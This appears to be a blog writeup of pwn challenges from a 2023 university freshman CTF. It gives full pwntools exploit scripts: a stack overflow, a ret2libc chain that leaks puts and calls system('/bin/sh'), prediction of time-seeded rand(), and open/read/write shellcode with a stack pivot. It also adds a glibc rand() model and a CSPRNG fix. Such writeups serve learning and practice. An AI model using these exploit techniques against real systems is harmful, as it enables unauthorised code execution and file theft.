GDOU2023 pwn writeups

T1d 2023-04-16

A freshman contest at GDOU (Guangdong Ocean University). The pwn challenges the setters wrote really were easy; I still don't understand how I failed to clear them all (AK), but anyway the last one did work locally 🥹🥹🥹

As a bonus, one web challenge that I stumbled into solving with two minutes left in the contest.

EASY PWN

easypwn

Really easy: nothing to work out, just overwrite outright:

from pwn import *

p = process('./easypwn')
# p = remote('node6.anna.nssctf.cn', 28171)
payload = b'a' * 0x1f   # plain overflow: 0x1f bytes of padding is all it takes
p.sendline(payload)
p.interactive()

Shellcode

shellcode

Saw NX was enabled, so straight ret2libc without thinking:

from pwn import *

# p = process('./shellcode')
p = remote('node4.anna.nssctf.cn', 28510)
elf = ELF('./shellcode')
lib = ELF('./libc6_2.27-3ubuntu1_amd64.so')   # the target's libc
pop_rdi = 0x00000000004007b3                   # pop rdi ; ret
ret_addr = 0x000000000040028e                  # single ret, used for stack alignment
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']
p.sendline(b'aaaa')
# stage 1: leak puts@got through puts@plt, then return to main for a second overflow
payload = b'a' * (0xa + 0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendline(payload)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))
base_addr = puts_addr - lib.sym['puts']
print(hex(base_addr))
system_addr = base_addr + lib.sym['system']
binsh_addr = base_addr + next(lib.search(b'/bin/sh'))
p.sendline(b'aaaa')
# stage 2: system("/bin/sh"); the extra ret keeps rsp 16-byte aligned for system()
payload = b'a' * (0xa + 0x8) + p64(ret_addr) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.sendline(payload)
p.interactive()

Real Men Descend 120 Floors

bin

Wrapped in a pile of random numbers, but nothing hard in itself:

from pwn import *
from ctypes import *

# p = process('./bin')
p = remote('node5.anna.nssctf.cn', 28986)
elf = ELF('./bin')
# same libc as the target, so rand() yields the same sequence
libc = cdll.LoadLibrary('./libc6_2.27-3ubuntu1_amd64.so')
libc.srand(libc.time(0))          # the binary seeds with the current time
v4 = libc.rand()
libc.srand(v4 % 3 - 1522127470)   # then reseeds from the first value, as the binary does
for i in range(120):              # one answer per floor
    p.sendline(str(libc.rand() % 4 + 1).encode())
p.interactive()
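Added example, not part of the original writeup: a pure-Python model of glibc's rand()/srand() (its TYPE_3 additive generator), which is the whole reason the 120 "random" checks above give no protection. The output is completely determined by the seed, and a seed of time(0) is known to the player as well as to the server. floors_for_time replays the writeup's reseed logic (v4 % 3 - 1522127470, then rand() % 4 + 1) without loading libc; secure_floor shows what the server should have drawn from instead.

```python
import secrets


def glibc_rand(seed):
    """Yield rand() outputs exactly as glibc returns them after srand(seed)."""
    seed &= 0xFFFFFFFF
    if seed == 0:               # glibc maps seed 0 to 1
        seed = 1
    r = [0] * 344
    r[0] = seed
    word = seed
    for i in range(1, 31):      # Park-Miller step via Schrage's method, as in srandom_r
        hi, lo = divmod(word, 127773)
        word = 16807 * lo - 2836 * hi
        if word < 0:
            word += 2147483647
        r[i] = word
    for i in range(31, 34):     # alias r[31..33] to r[0..2] so one recurrence covers the wraparound
        r[i] = r[i - 31]
    for i in range(34, 344):    # the 310 values glibc discards right after seeding
        r[i] = (r[i - 31] + r[i - 3]) & 0xFFFFFFFF
    i = 344
    while True:                 # additive feedback: x[i] = x[i-31] + x[i-3] mod 2^32
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
        yield r[i] >> 1         # rand() returns the top 31 bits
        i += 1


def floors_for_time(t):
    """The 120 answers the challenge expects if it was started at time t.

    Mirrors the writeup's script: srand(t); v4 = rand(); srand(v4 % 3 - 1522127470);
    then rand() % 4 + 1 per floor. The negative int handed to srand() is converted
    to unsigned by C; that is modelled here with & 0xFFFFFFFF.
    """
    v4 = next(glibc_rand(t))
    g = glibc_rand((v4 % 3 - 1522127470) & 0xFFFFFFFF)
    return [next(g) % 4 + 1 for _ in range(120)]


def secure_floor():
    """What a server should do instead: draw from the OS CSPRNG, not from a time seed."""
    return secrets.randbelow(4) + 1
```

Anyone who can guess the server's clock to the second gets the identical 120 answers; a per-game value from the OS CSPRNG removes that replay entirely.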

Random

RANDOM

It's named "random", but it's actually a sandboxed shellcode challenge: I pivoted the stack and wrote ORW (open/read/write) shellcode. First time I hand-wrote part of the shellcode myself; unfortunately it didn't work on remote:

from pwn import *
from ctypes import *

context(arch='amd64')
p = process('./RANDOM')
# p = remote('node6.anna.nssctf.cn', 28599)
elf = ELF('./RANDOM')
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
p.sendline(str(libc.rand() % 50).encode())   # pass the time-seeded "random" check
haha_addr = 0x40094A
# open/read/write: the sandbox blocks execve, so read the flag file directly
shellcode1 = asm('''
    mov edx,0x67616c66      /* "flag" */
    push rdx
    mov rdi,rsp             /* rdi -> "flag" */
    mov eax,2               /* open */
    syscall
    mov edi,eax             /* fd returned by open */
    mov rsi,rsp             /* read into the stack */
    xor eax,eax             /* read */
    syscall
    xor edi,2               /* fd 3 ^ 2 = 1: stdout */
    mov eax,edi             /* write */
    syscall
''')
# stack pivot: move rsp back onto the shellcode and jump to it
shellcode2 = asm("""
    xor esi,esi
    sub rsp,0x28
    jmp rsp
""")
print(len(shellcode1))
print(len(shellcode2))
payload = shellcode1 + shellcode2 + p64(haha_addr)
p.sendline(payload)
p.interactive()

hate eat snake

A web challenge, and a very funny one. Still angry about RANDOM, I went to try the 60-second challenge; obviously my clumsy hands couldn't manage it, but I was pleasantly surprised to find that after the snake died, the timer kept counting if I just left it there, so I waited out the 60 seconds and picked up a flag 🥵🤗💥💖

Last modified: 2023-07-30 16:23